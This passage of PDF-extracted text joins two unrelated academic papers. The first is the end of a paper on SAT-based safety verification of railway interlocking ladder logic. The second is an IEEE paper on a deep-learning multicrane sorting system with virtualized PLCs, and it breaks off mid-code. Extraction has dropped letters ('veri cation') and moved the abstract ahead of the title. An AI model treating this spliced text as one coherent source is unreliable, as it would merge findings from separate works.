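                    f"(not({signal}.G) and {signal}.G' and {rn}.U) "
                    f"=> not(T{t}.OCC(IL))")
    return concrete

for formula in instantiate(trackplan):
    print(formula)
# (not(S100.G) and S100.G' and S100(AM).U) => not(TAA.OCC(IL))
```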
Clausegen Intermediate TPTP Files SAT Solver Safety Conditions (.cond) Ladder Logic Program (.wt2) Counter-example Trace Positive Verification Result Fig. 3. The Software Structure of the Veri cation Tool The core of the Swansea tool can be divided into two separate operations. The rst operation is the translation from generic safety properties in temporal rst order logic into concrete formulae in temporal propositional logic. In order to perform this translation, some encoding of a track plan is required that provides layout and naming information which are substituted into the generic formulae, see the transforma- tions described in the previous section. The second operation performed by the tool is larger in scope, see Figure 3. Here the software accepts a ladder logic program, a safety condition le (containing at least one temporal propositional formula describing a safety condition), and a number of arguments describing the required veri cation approach. It then handles the veri cation process, including utilisation of a SAT-solver to produce the veri cation output resulting from the chosen methodology. The veri cation approaches that are supported include inductive veri cation [2] [4], bounded model check- ing [2], [3] and temporal (or K) induction [2], [3]. As these approaches have been developed in other papers, here we simply refer the reader to those papers for details. V. A PPLICATION TO A SIEMENS INTERLOCKING To illustrate how the full veri cation approach works, the ladder logic for controlling a scheme plan provided by Siemens Rail Automation UK for illustrative purposes, has been veri ed against a series of newly modelled safety prin- ciples, see Figure 4 for a summative overview of which veri- cation attempts were successful and which produce counter- examples. When veri cation is successful, there is no need for Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. further action. However, when veri cation produces a counter- example, an error analysis needs to take place. As the yellow and red areas in Figure 4 show, veri cation failed in a number of cases. A. Abstract Error Analysis In principle there are a number of reasons why veri cation of a safety property might fail. They include: 1) Wrong encoding of the safety property in FOL. 2) Wrong use of names of propositional variables. 3) A deliberate deviation from the property in the ladder logic program. 4) A false positive. 5) A mistake in the ladder logic program. A wrong encoding of a safety property might arise due to communication problems. Experts in formal methods are not necessarily experts on railway, and rail engineers have seldom received training in formal methods. Similarly, naming conventions in ladder logic programs are often not properly documented. For the rail engineer, the chosen conventions make sense, although the formal methods expert will have to take a given mapping without having a means of control at hand. However, as safety properties and naming conventions remain stable over longer periods of time, this kind of mis- takes can be eliminated by use, i.e., after many veri cation attempts have been carried out successfully, the proportion of these mistakes will decrease. A similar argument will apply to the deliberate deviation from the property in the ladder logic program: this will not happen only once, but will happen only as an established programming practice. 
In this case, it would be adequate to change the safety property accordingly, in order to verify that the deviating behaviour has been encoded correctly. A false positive will arise when the safety property to be veri ed is not inductive , i.e., all reachable states are safe, however, there exists a safe, unreachable state with a transition into an unsafe state. In order to exclude false positives, one needs to add a suitable invariant to the veri cation. The effect of such an invariant is to reduce the considered state space, hopefully excluding all safe unreachable states with a transition to an unsafe state. Finding such invariants is a challenge, but can work, see, e.g., [1]. Only in the last case is there a need to actually change the ladder logic program. It takes experience and (manual) work, to isolate this case from the others. B. Concrete Error Analysis In particular for our results, see Figure 4, Ref 1highlights an incorrect use of propositional variables (reason 2). This was resolved after reviewing the counter-examples with Siemens Rail Automation UK: highlighted by the change of the row from yellow (top) to green (bottom). Ref 22highlights an incorrect encoding of the safety prop- erty in FOL (reason 1). This was resolved after reviewing the counter examples with Siemens Rail Automation UK: highlighted by the yellow row in the bottom table.Property Reference Inductive Result BMC Result 1 Yellow Yellow 6 Red Yellow 12 Yellow Yellow 22 Red Red 32 Green Green 35 Yellow Yellow Property Reference Inductive Result BMC Result 1 Green Green 6 Red Yellow (*) 12 Yellow Yellow (*) 22 Yellow Yellow (*) 32 Green Green 35 Green Green Fig. 4. Results before (top) and after (bottom) consultation with Siemens Rail Automation UK engineers. The left hand column shows the results of inductive veri cation, whilst the right shows the results of bounded model checking for 50steps. Green means that all concrete instances of a safety principle were veri ed; Yellow means that some of the concrete instances were veri ed, others not; Red means all concrete instances were not veri ed. Finally the star ( ) in the right column of the bottom table indicates that some instances fail due to reason 3or4. Here further scienti c investigation is on going into automated methods for excluding false positives. Overall we could verify just under 50% of the properties using inductive veri cation, whilst for 85% of the properties, no counter examples were found whilst running bounded model checking. VI. C ONCLUSIONS AND PERSPECTIVES The veri cation results achieved show that the technology developed is ready for implementation in interlocking design processes: in terms of run-time and memory-usage, it is possible to verify actual interlocking programs with thousands of lines of code. However, what currently is missing is that veri cation can t fail due to the reasons Wrong encoding of the safety property in FOL or Wrong use of names of propositional variables . We are positive, that Siemens Rail Automation UK engineers together with Swansea academics will run enough experiments to achieve this aim. In future work we plan to add automated invariant nding, c.f. [1]. Acknowledgement. We thank Erwin R. Catesbeiana (Jr.) for inspiring our summative visualization approach. REFERENCES [1] Alessandro Cimatti, Alberto Griggio, Sergio Mover, and Stefano Tonetta. In nite-state invariant checking with ic3 and predicate abstraction. Formal Methods in System Design , 49(3):190 218, Dec 2016. [2] Phillip James. 
SAT-based Model Checking and its applications to Train Control Software. Master s thesis, Swansea University, 2010. [3] Phillip James and Markus Roggenbach. SAT-based Model Checking of Train Control Systems. In Calco-Jnr 2009 , March 2010. [4] Karim Kanso. Formal veri cation of ladder logic. Master s thesis, Swansea University, 2008. [5] Railway Group Standard. Interlocking principles, 2003. Standards Document GK/RT0060. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply.
Multicrane_Visual_Sorting_System_Based_on_Deep_Learning_With_Virtualized_Programmable_Logic_Controllers_in_Industrial_Internet.pdf
We develop a deep-learning-based multicrane visual sorting system with virtualized programmable logic controllers (PLCs) in intelligent manufacturing, which enables the accurate location and suction of the materials on the conveyor belt. First, virtualized PLCs are deployed in the field and the cloud to break data islands for efficient communication between low-level devices. Second, artificial intelligence algorithms are integrated into the physical industrial control system, in which cooperation between virtualized PLCs and the visual recognition model is developed to complete the industrial control closed loop. Third, we establish a visual recognition model in which object detection algorithms are used to process the original image and then obtain the position and type of the object in the pixel coordinate system. In addition, a new linear interpolation-based backpropagation neural network is presented to provide the transform relation between the pixel coordinate system and the world coordinate system that the crane needs to precisely suck the material. The whole system is applied in a time-sensitive network environment in a highly reliable and stable manner. The experimental prototype system demonstrates that high recognition accuracy can be achieved for the visual sorting system within an acceptable time frame. The accuracy of the sorting task reaches 96.5% and the average consumption time of each object is approximately 2.317 s when the speed of the conveyor belt is 5.2 m/min. Manuscript received 1 January 2023; revised 8 March 2023 and 28 July 2023; accepted 27 August 2023. Date of publication 22 September 2023; date of current version 23 February 2024. This work was supported in part by the National Key Research and Development Program under Grant 2020YFB1708800, in part by Guangdong Key Research and Development Program under Grant 2020B0101130007, in part by the Fundamental Research Funds for Central Universities under Grant FRF-MP-20-37, in part by Guangdong Basic and Applied Basic Research Foundation under Grant 2021A1515110577, in part by China Postdoctoral Science Foundation under Grant 2021M700385, and in part by the Central Guidance on Local Science and Technology Development Fund of Shanxi Province under Grant YDZJSX2022B019. Paper no. TII-23-0005. (Corresponding author: Jianquan Wang.) Meixia Fu, Zhenqian Wang, Jianquan Wang, Qu Wang, and Zhangchao Ma are with the School of Automation and Electrical Engineering, Institute of Industrial Internet, University of Science and Technology Beijing, Beijing 100083, China (e-mail: [email protected]; [email protected]; [email protected]; [email protected]; [email protected]). Danshi Wang is with the State Key Laboratory of Information Photonics and Optical Communications, Beijing University of Posts and Telecommunications, Beijing 100876, China (e-mail: [email protected]). Color versions of one or more figures in this article are available at https://doi.org/10.1109/TII.2023.3313641. Digital Object Identifier 10.1109/TII.2023.3313641
3726 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Multicrane Visual Sorting System Based on Deep Learning With Virtualized Programmable Logic Controllers in Industrial Internet Meixia Fu , Zhenqian Wang , Jianquan Wang, Qu Wang , Zhangchao Ma , and Danshi Wang , Senior Member, IEEE Index Terms Backpropagation (BP) neural network, deep learning, intelligent manufacturing, linear interpola-tion, virtualized programmable logic controllers (PLCs), vi-sual sorting system. I. INTRODUCTION INTELLIGENT manufacturing [1]has recently received in- creasing attention from both academia and industry world- wide, which is necessary to integrate with many emergingtechnologies, such as arti cial intelligence (AI) [2],[3],5 G [4], and edge computing [5], to improve the architecture of the Industrial Internet. In particular, the intellectualization provides the development in the unmanned direction and transforms industrial chains. The hierarchical architecture of the industrial automation pyramid is introduced in Fig. 1, which consists of ve levels, including the eld level, control level, supervisory level, op-eration level, and enterprise level from the bottom to the top [6],[7]. The eld data are processed level by level, which cannot effectively apply emerging technologies in industrialarchitecture and seriously in uences the effectiveness and time- liness of urgent applications. The control level occupies an important position in the pyramid structure, which aims touse programmable logic controllers (PLCs) [8]that sense the inputs, execute the developed program, and write the outputs. For example, PLCs control the speed of cranes and facilitatethe collection of the materials on the conveyor belt through suction in industrial visual sorting systems. However, tradi- tional PLCs cannot realize data interworking between devices because of different industrial control protocols. It is dif cult to meet the exible and scalable deployment of traditionalPLCs with high costs. Furthermore, emerging technologies are dif cult to implement in industrial control systems. The control function is necessary to be virtualized and cooperate with AIapplications in the cloud to meet the requirements of Industry 4.0[9]. Visual sorting systems [10] occupy an important position in intelligent manufacturing due to the development of deep learning [11]. Speci cally, multicrane visual sorting systems with cooperation have attracted more interest because of their 1551-3203 2023 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3727 Fig. 1. Hierarchical architecture of the industrial automation pyramid. massive applications in iron mining, steel metallurgy, coal min- ing, and other elds. Multicrane visual sorting systems have twomain critical technologies, including object detection [12] that aims to recognize the type of the object and obtain the pixel coordinates, and coordinate conversion [13] that aims to get the world pixel coordinates of all materials. However, many key technology challenges remain due to the high-precision andreliability requirements of systems. 
In addition, the devices in the visual sorting system are controlled by PLCs, which need to cooperate to complete the sorting task. To address the above challenges, this article improves the hierarchical architecture of the industrial automation pyramid, as shown in Fig. 1. The function of traditional PLCs is virtualized so that it can be flexibly deployed in the field or the cloud for interworking equipment. The number of PLCs can be set flexibly according to the available CPU resources. The data of low-level devices can be sent to the cloud to support AI applications. The result of the AI platform is transmitted to cloud PLCs (C-PLCs) that conduct the operation of field devices. In addition, we develop a deep-learning-based multicrane visual sorting system, which enables the accurate location and suction of the materials on the conveyor belt. Virtualized PLCs are applied to conduct the cranes in a time-sensitive network (TSN) environment for highly reliable and stable control. Deep-learning-based methods and camera calibration approaches are used to locate and recognize materials. The main contributions can be summarized as follows.
1) The C-PLCs and field virtualized PLCs (F-vPLCs) are developed in the cloud and the field instead of traditional hardware PLCs, which can break data islands and realize collaboration between low-level devices.
2) AI algorithms are integrated into the industrial control system, in which the cooperation between the visual recognition model and virtualized PLCs is completed to control the multicrane system and suck the materials.
3) In the visual sorting system, the you only look once (YOLOv5) algorithm is utilized to obtain the types and pixel coordinates of the objects. A new linear interpolation-based backpropagation (BP) network is proposed to optimize the transformation between the pixel coordinate system and the world coordinate system.
4) A multicrane visual sorting experimental platform is established to verify the proposed methods. Abundant experimental results demonstrate the performance of the whole framework.
The rest of this article is organized as follows. In Section II, we present the related work concerning the evolution of PLCs, object detection, and camera calibration. Section III introduces the deployment of virtualized PLCs, the multicrane visual sorting system, and the visual recognition algorithms. Section IV presents a large number of experimental results and analyses. Finally, Section V concludes this article.
II. RELATED WORK
With the flexibility and scalability requirements of intelligent manufacturing, it is necessary to explore an integrated method to break the data island and improve the coordination among devices. Many control function methods have been proposed. A PLC programming environment based on a virtual plant was proposed to provide efficient construction processes in discrete event systems, which supported the specification of discrete-event models in a hierarchical, modular manner [14]. Real hardware PLCs based on real plants were designed to connect a 3-D layout model and a control program [15]. Cloud-based software PLCs were introduced to achieve improved scalability and multitenancy performance [16], in which the devices and sensors were connected to the cloud through the OPC-UA protocol [17] and controlled by software PLCs that could dynamically scale and assign workloads. A novel virtual-PLC approach was demonstrated to prevent significant remote attack perturbation in industrial control systems [18].
However, the above PLCs cannot be deployed on the cloud or the eld and do not have AI applica- tion capabilities. There are massive devices in the factory, many of which are required to cooperate with each other for the same task; for instance, in a multicrane visual sorting system, eachcrane needs to work cooperatively. It is necessary to research Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3728 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 virtualized PLCs and cooperate with emerging technologies for Industry 4.0. In a multicrane visual sorting system, the materials on the conveyor belt are necessary to be located and recognized. Con-volutional neural network (CNN) based algorithms [19] have been widely used in object detection and classi cation and have achieved excellent performance in computer vision [20]. There are two main series of methods, including the one- stage algorithms in the YOLO [21] architecture series and the single-shot multiBox detector [22] architecture series, and the two-stage algorithms in the faster region-based convolutional network (R-CNN) [23] architecture series. An edge intelligence- based improved YOLOv4 framework that included a channel at- tention mechanism and a high-resolution network was proposed to improve vehicle detection [24]. Faster R-CNN was applied to automatically classify wheel hubs and send them to the correct the operation location in production lines for high detection accuracy [10]. A single-stage grasp detection framework based on a region proposal network architecture was designed for a robotic grasp system, the network complexity of which was lower than that of a two-stage architecture [25]. However, these object detection methods are used in wheel hub location and robotic grasp tasks but are unsuitable for multicrane sorting systems. Compared with two-stage algorithms, the YOLO archi-tecture series achieves signi cant performance and complexity improvements. Due to the requirements of high accuracy and timeliness, a fast detection algorithm [26] should be considered in the intelligent multicrane system for further enhancement. Additionally, there are many improved camera calibration methods [27]. Zhang [28] proposed the most typical camera calibration method that executes transformations from the pixel coordinate system and the world coordinate system via differenttransformation matrices. An inverse matrix is a kind of complex nonlinear transformation that can be tted by a neural network, and such a matrix performs very well in complicated nonlin-ear mapping relation cases. Sheng et al. [29] proposed a BP neural-network-based camera calibration method to reconstruct 3-D coordinates from pixels under an image coordinate sys-tem. A CNN-based camera calibration method was proposed to recognize checkerboard corners and obtain the mean square error (MSE) per image [30]. However, these methods only consider the pixel coordinates on the corners of the checkerboard and more points are necessary to be considered, especially for deep-learning-based methods. III. M ULTICRANE VISUAL SORTING SYSTEM WITH VIRTUALIZED PLC S A. Flexible Deployment of Virtualized PLCs We develop a exible deployment framework of virtualized PLCs in Fig. 2in which F-vPLCs and C-PLCs are set in the eld and the cloud, respectively. 
The low layer relates to input/output modules that consist of field components and industrial personal computers (IPCs). There are massive numbers of devices, such as electric machinery, conveyor belts, cranes, transducers, automated guided vehicles, and other sensors in the industrial process, which need to be connected to the network. We employ many F-vPLCs in the IPCs that control the running of low-level devices and support Modbus, EtherCAT, Profinet, Powerlink, and other protocols [31].
Fig. 2. Flexible deployment framework of virtualized PLCs in the field and the cloud.
The communication network can be a wired network, such as TSN, or a wireless network, such as a 5G-TSN bridge. In the experiments, we initially use TSN as the data transmission channel for low latency, ultrareliability, and deterministic communications. On the cloud, we employ a C-PLCs server, such as an X86 server, and an AI server. The number of C-PLCs mainly depends on the CPU resources. The vision module on the AI server obtains the video stream from the camera and processes the data to obtain the types, positions, and timestamps of the materials in the multicrane visual sorting system, the results of which are transmitted to the C-PLCs server. A transmission control protocol (TCP) [32] link is established between the AI server and the C-PLCs server. Moreover, the AI server clock needs to be synchronized with the C-PLCs clock because the moving distance and sorting position of the crane are calculated from the time difference between the C-PLCs server and the AI server. We use the network time protocol (NTP) [33] to synchronize them in this system. Both the C-PLCs server and the AI server are designed as NTP clients, which are synchronized with the NTP server to achieve indirect time synchronization. The synchronization time of NTP is less than 1 ms, which hardly affects the operation of the whole system.
Fig. 3 shows the structure of the virtualized PLC, which consists of the server, operating system, runtime, and integrated development environment (IDE). The common servers are X86 servers on the cloud or IPCs in terminals. An X86 server for cloud PLCs and IPCs for F-vPLCs are used in the multicrane visual sorting system. Both Windows and Linux operating systems are supported. The Linux operating system is adopted in the experiments. Docker as the runtime is designed to make virtual PLCs integrate and deploy flexibly in the field and on the cloud.
Fig. 3. Example of the virtualized PLC.
Fig. 4. Framework of the intelligent multicrane visual sorting system.
In the IDE, we can develop many modules, including cloud-edge-terminal collaborative deployment, computing resource management, and multitask distributed scheduling. Once the data and control function are improved in the cloud, AI algorithms can be combined with them to realize industrial intelligence and unmanned control. Finally, a multicrane visual sorting system is established in which the flexible deployment of virtualized PLCs is conducted to control devices.
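As a concrete illustration of this interface, the following minimal Python sketch shows the kind of timestamped result message the AI server could push to the C-PLCs server over the TCP link, assuming NTP-aligned clocks on both hosts. The JSON encoding, field names, host address, and port are assumptions made for illustration; the authors do not specify the wire format.

```python
import json
import socket
import time

# Hypothetical endpoint of the C-PLCs server; both hosts are assumed to be
# NTP-synchronized so that time.time() values are comparable across machines.
C_PLC_HOST, C_PLC_PORT = "192.168.1.10", 5020

def send_detection(sock, material_type, world_xyz):
    """Push one detection result (type, world coordinates, timestamp) to the C-PLCs server."""
    msg = {
        "type": material_type,     # e.g., "red" or "black" chess piece
        "world": world_xyz,        # (Xw, Yw, Zw) in cm, from the calibration module
        "timestamp": time.time(),  # NTP-disciplined wall-clock time in seconds
    }
    # Newline-delimited JSON keeps framing simple over the stream socket.
    sock.sendall((json.dumps(msg) + "\n").encode("utf-8"))

if __name__ == "__main__":
    with socket.create_connection((C_PLC_HOST, C_PLC_PORT)) as sock:
        send_detection(sock, "red", (35.0, 10.0, 0.0))
```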
B. Multicrane Visual Sorting System Based on Deep Learning With Virtualized PLCs
In this section, we design a multicrane visual sorting system based on deep learning with virtualized PLCs, the framework of which is illustrated in Fig. 4. There are four core modules: the material conveyance module, the object detection module, the camera calibration module, and the control module. First, the material conveying module uses a conveyor belt to transport materials, and one camera is fixed on the cranes to capture the images of materials in the field. Then, the images are sent to the object detection module on the AI server, which utilizes intelligent methods to process the data and obtain the positions and types of the materials on the conveyor belt. Here, each position is represented as pixel coordinates, which cannot be given to the PLCs directly and need to be converted to world coordinates. Next, a new camera calibration module on the AI server is designed to change the pixel coordinates into world coordinates. Afterward, the world coordinates, types, and timestamps of the materials are transmitted to the control module, in which the C-PLC sends commands to the F-vPLCs. Finally, the F-vPLCs control two cranes that suck materials and place them in the designated boxes. There are two critical components in the visual sorting system: the visual recognition algorithm and the camera calibration method, which seriously affect the sorting accuracy. Hence, we mainly introduce the object detection module and camera calibration module as follows.
Fig. 5. Structure of YOLOv5 for material detection in the visual sorting system.
C. Object Detection Module
We apply the YOLOv5 algorithm to detect and recognize the materials on the conveyor belt. The architecture of YOLOv5, as shown in Fig. 5, consists of three main parts: backbone, neck, and prediction. The backbone extracts the salient features of the input images. A cross-stage partial network [34] is integrated into Darknet [35] to create CSPDarknet as the backbone of YOLOv5. Compared with Darknet53 in YOLOv3, CSPDarknet53 performs significantly better in terms of its computation time and detection accuracy. The purpose of the neck is to generate feature pyramids and recognize the same object with multiscale feature fusion. A path aggregation network (PAN) [36] is used in the neck, which can easily connect the feature grid and all feature layers. Compared with the feature pyramid network [37] in YOLOv3, PAN can obtain more useful features from the low and high layers. The prediction module outputs vectors that consist of the coordinates, classification result, and confidence score of the predicted bounding box, which is the same as in YOLOv3. Finally, the positions and types of the materials on the conveyor belt are obtained. We compare the performance of YOLOv3 and YOLOv5 on the visual recognition module in Section IV.
For each bounding box, the output of YOLOv5 predicts the values (x1, y1, x2, y2, C, P). (x1, y1) denotes the lower-left corner coordinates and (x2, y2) represents the upper-right corner coordinates of the bounding box. C is the classification of the bounding box. P is the confidence score that reflects how accurately the bounding box is predicted. These predicted quantities are utilized to calculate the loss that optimizes the network. The total loss of YOLOv5 consists of a regression loss, a classification loss, and a confidence loss.
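Before detailing each loss term, the following minimal sketch shows how the per-box output (x1, y1, x2, y2, C, P) described above can be read out of a YOLOv5 model loaded through the torch.hub entry point of the public ultralytics/yolov5 repository [26]. The generic pretrained yolov5s weights and the image path are placeholders standing in for the authors' chess-piece model and conveyor-belt frames, which are not released.

```python
import torch

# Load a YOLOv5 model through torch.hub (public ultralytics/yolov5 repo, ref. [26]).
# 'yolov5s' pretrained weights are a stand-in for the authors' chess-piece model.
model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)

# One conveyor-belt frame; the file name is a placeholder.
results = model("frame_0001.jpg")

# results.xyxy[0] is an (N, 6) tensor holding, per detection:
# x1, y1, x2, y2, confidence P, class index C, i.e. the per-box output described above.
for x1, y1, x2, y2, conf, cls in results.xyxy[0].tolist():
    print(f"class={int(cls)}  P={conf:.2f}  box=({x1:.0f},{y1:.0f})-({x2:.0f},{y2:.0f})")
```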
Regression loss: The diagonal coordinates (x1, y1, x2, y2) of the predicted and ground-truth boxes are used for bounding box regression. The generalized intersection over union (GIoU) [38] method is utilized as the regression loss to drive the predicted coordinates close to the ground-truth coordinates. Compared with IoU, GIoU solves the problem that the IoU is always 0, and thus provides no useful gradient, when the predicted bounding box and the ground-truth bounding box do not overlap. Let A be the predicted bounding box and B be the ground-truth bounding box. IoU is calculated as the ratio of the intersection area to the union area of A and B. C is the smallest box that encloses both A and B. The difference between the area of C and the union area is obtained, and GIoU is IoU minus the ratio of this difference to the area of C. The regression loss is summarized as follows:
$$L_{\mathrm{reg}} = 1 - \mathrm{GIoU} = 1 + \frac{A^{C} - A^{U}}{A^{C}} - \mathrm{IoU} \qquad (1)$$
where $A^{C}$ is the area of $C$, the smallest box that includes $A$ and $B$, and $A^{U}$ is the area of the union of the predicted box $A$ and the ground-truth box $B$.
Classification loss: It aims to recognize and optimize the classification of materials. Binary cross entropy with logits loss [39] is used and summarized as follows:
$$L_{\mathrm{cls}} = -\frac{1}{N}\sum_{i=1}^{N}\left[\hat{C}_{i}\ln\big(\mathrm{sigmoid}(C_{i})\big) + \big(1-\hat{C}_{i}\big)\ln\big(1-\mathrm{sigmoid}(C_{i})\big)\right] \qquad (2)$$
where $N$ is the size of the minibatch, $C_{i}$ is the predicted classification logit, and $\hat{C}_{i}$ is the classification label.
Confidence loss: It aims to optimize the confidence of the bounding box. We also use binary cross entropy with logits loss as the confidence loss, which is given by
$$L_{\mathrm{con}} = -\frac{1}{N}\sum_{i=1}^{N}\left[\hat{P}_{i}\ln\big(\mathrm{sigmoid}(P_{i})\big) + \big(1-\hat{P}_{i}\big)\ln\big(1-\mathrm{sigmoid}(P_{i})\big)\right] \qquad (3)$$
where $N$ is the size of the minibatch, $P_{i}$ is the predicted confidence, and $\hat{P}_{i}$ is the confidence label, whose value lies in [0, 1].
The total loss of YOLOv5 is
$$L_{\mathrm{total}} = L_{\mathrm{reg}} + L_{\mathrm{cls}} + L_{\mathrm{con}}. \qquad (4)$$
D. Typical Camera Calibration Method
Camera calibration [28] aims to describe the connection between the pixel coordinate system and the world coordinate system, which requires three transformations, as shown in Fig. 6.
Fig. 6. Mathematical model of camera calibration.
The first is from the pixel coordinate system $(u, v)$ to the image coordinate system $(x, y)$, where the relation between them is
$$\begin{bmatrix} u \\ v \\ 1 \end{bmatrix} = \begin{bmatrix} 1/d_{x} & 0 & u_{0} \\ 0 & 1/d_{y} & v_{0} \\ 0 & 0 & 1 \end{bmatrix}\begin{bmatrix} x \\ y \\ 1 \end{bmatrix} \qquad (5)$$
where $(u_{0}, v_{0})$ is the coordinate of the origin $o$ in the pixel coordinate system, and $(d_{x}, d_{y})$ indicates the number of pixels corresponding to the unit length in the image coordinate system. The second is from the image coordinate system $(x, y)$ to the camera coordinate system $(X_{c}, Y_{c}, Z_{c})$, and the relation between them can be summarized as follows:
$$Z_{c}\begin{bmatrix} x \\ y \\ 1 \end{bmatrix} = \begin{bmatrix} f & 0 & 0 & 0 \\ 0 & f & 0 & 0 \\ 0 & 0 & 1 & 0 \end{bmatrix}\begin{bmatrix} X_{c} \\ Y_{c} \\ Z_{c} \\ 1 \end{bmatrix} \qquad (6)$$
where $f$ is the focal length of the camera. The last is from the camera coordinate system $(X_{c}, Y_{c}, Z_{c})$ to the world coordinate system $(X_{w}, Y_{w}, Z_{w})$, and the relation between them can be summarized as follows:
$$\begin{bmatrix} X_{c} \\ Y_{c} \\ Z_{c} \\ 1 \end{bmatrix} = \begin{bmatrix} R & T \\ 0^{T} & 1 \end{bmatrix}\begin{bmatrix} X_{w} \\ Y_{w} \\ Z_{w} \\ 1 \end{bmatrix} \qquad (7)$$
where $R$ is a rotation matrix of size $3\times 3$, $T$ is a translation matrix of size $3\times 1$, and $0^{T}$ is $(0, 0, 0)$.
According to (5)-(7), the relation between the pixel coordinate system and the world coordinate system can be obtained as follows:
$$Z_{c}\begin{bmatrix} u \\ v \\ 1 \end{bmatrix} = A\,[R, T]\,P = \begin{bmatrix} f_{x} & 0 & u_{0} & 0 \\ 0 & f_{y} & v_{0} & 0 \\ 0 & 0 & 1 & 0 \end{bmatrix}\begin{bmatrix} R & T \\ 0^{T} & 1 \end{bmatrix}\begin{bmatrix} X_{w} \\ Y_{w} \\ Z_{w} \\ 1 \end{bmatrix} \qquad (8)$$
where $A$ is the internal parameter matrix of the camera, $[R, T]$ is the external parameter matrix of the camera, and $P$ is a real point in the world coordinate system. The typical camera calibration method is closely tied to the parameters of the camera, and the error of the inverse transformation is large during the solving process.
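A short NumPy sketch of the forward mapping in (8) helps make the point: projecting a world point into pixels is a simple matrix product, but the reverse mapping needs the depth $Z_{c}$ and well-conditioned camera parameters. The intrinsic and extrinsic values below are placeholders, not the calibrated parameters reported later in Table III.

```python
import numpy as np

# Placeholder intrinsics/extrinsics (not the calibrated values of Table III).
fx, fy, u0, v0 = 1000.0, 1000.0, 960.0, 540.0
A = np.array([[fx, 0.0, u0, 0.0],
              [0.0, fy, v0, 0.0],
              [0.0, 0.0, 1.0, 0.0]])          # internal parameter matrix in its 3x4 form
R = np.eye(3)                                  # rotation, 3x3
T = np.array([[0.0], [0.0], [100.0]])          # translation, 3x1 (cm)
RT = np.vstack([np.hstack([R, T]), [0.0, 0.0, 0.0, 1.0]])   # [[R, T], [0^T, 1]]

def world_to_pixel(Pw):
    """Forward mapping of (8): world point (Xw, Yw, Zw) -> pixel coordinates (u, v)."""
    Pw_h = np.append(np.asarray(Pw, dtype=float), 1.0)   # homogeneous (Xw, Yw, Zw, 1)
    uvw = A @ RT @ Pw_h                                   # equals Zc * (u, v, 1)
    return uvw[0] / uvw[2], uvw[1] / uvw[2]

print(world_to_pixel((5.0, 5.0, 0.0)))
# The inverse mapping (pixel -> world) is not directly available: without the depth Zc
# the 3x4 projection cannot simply be inverted, which motivates the learned
# (BP-network) calibration discussed next.
```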
Equation (8) shows that the relation between the pixel coordinate system and the world coordinate system is complex and nonlinear. A BP neural network performs very well in representing such nonlinear relations. Therefore, a new linear interpolation-based BP neural network is proposed for camera calibration and compared with the typical camera calibration method.
E. Linear Interpolation-Based BP Neural Network for Camera Calibration
The primary procedure of camera calibration is to make a checkerboard with a size of 5 cm x 5 cm for each black and white square, because the units of the coordinates in the crane system are 5 cm. The comparison between the base calibration and the linear interpolation-based calibration methods is presented in Fig. 7.
Fig. 7. Comparison of base calibration and linear interpolation-based calibration. (a) The base calibration. (b) The linear interpolation-based calibration.
The red points in the corners are the training data for the BP neural network in Fig. 7(a), but the other points are never considered, which can cause large errors when the materials are not located at the corners. Therefore, the linear interpolation method is utilized to obtain more points in Fig. 7(b), which provides more training data for the BP neural network to establish the relation between the pixel coordinate system and the world coordinate system. This improves the robustness of the BP network in cases with more materials on the conveyor belt.
Fig. 8. Architecture of BP neural network for coordinate transformation.
Fig. 8 shows the architecture of the BP neural network, which consists of ten layers: an input layer, eight hidden layers, and an output layer. In this work, the input is the pixel coordinate $(u, v)$ and the output is the world coordinate $(X_{w}, Y_{w}, Z_{w})$. The eight hidden layers have different numbers of neurons, namely 10, 24, 48, 96, 192, 96, 48, and 24. The weights $w_{ij}$ between the input layer and the first hidden layer can be taken as a $3\times 10$ matrix. The $j$th neuron's output for the first hidden layer is
$$O^{(1)}_{j} = f\big(W^{T}x, b\big) = f\left(\sum_{i=1}^{I} w_{ij}x_{i} + b^{(1)}\right) \qquad (9)$$
where $i = 1, 2, 3$, $j = 1, 2, \ldots, 10$, $x_{i}$ is the coordinate of the feature points $(u, v, 1)$, and $b^{(1)}$ is the bias $(b_{1}, b_{2}, \ldots, b_{j})$. $f$ is the activation function, which is a rectified linear unit (ReLU) [40] and can be summarized as follows:
$$f(x) = \begin{cases} x, & x > 0 \\ 0, & x \le 0. \end{cases} \qquad (10)$$
The neurons' outputs for the other hidden layers have the same form as in (9). The $n$th neuron's output for the output layer is
$$O^{(9)}_{n} = f\big(W^{T}x, b\big) = f\left(\sum_{m=1}^{M} w_{mn}O^{(8)}_{m} + b^{(9)}\right) \qquad (11)$$
where $m = 1, 2, \ldots, 24$ and $n = 1, 2, 3$. $O^{(8)}_{m}$ is the $m$th neuron's output for the last hidden layer, $f$ is still the ReLU function, and $b^{(9)}$ is the bias. The relation between the pixel coordinate system and the world coordinate system in (8) can thus be replaced by the BP neural network, which fits the nonlinear relationship well. Furthermore, the BP neural network does not need to use the parameters of the camera to solve the inverse transformation, which would otherwise cause large coordinate conversion errors.
The loss function is the MSE loss [41], which can be summarized for one point as follows:
$$\mathrm{MSELoss} = \frac{1}{K}\sum_{k=1}^{K}\big(\hat{y}_{k} - y_{k}\big)^{2} \qquad (12)$$
where $\hat{y}_{k}$ is the prediction $O^{(9)}_{n}$ of the BP neural network and $y_{k}$ is the truth label, which is the world coordinate $(X_{w}, Y_{w}, Z_{w})$ in this article. The value of $K$ is 3. For a minibatch, the total loss is the average of all MSE loss values for updating the network.
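A minimal PyTorch sketch of the network in Fig. 8 is given below: a homogeneous pixel input (u, v, 1), eight hidden ReLU layers with 10, 24, 48, 96, 192, 96, 48, and 24 neurons, three outputs (Xw, Yw, Zw), and the MSE loss of (12). The optimizer, learning rate, and toy correspondences are assumptions, not the authors' training setup.

```python
import torch
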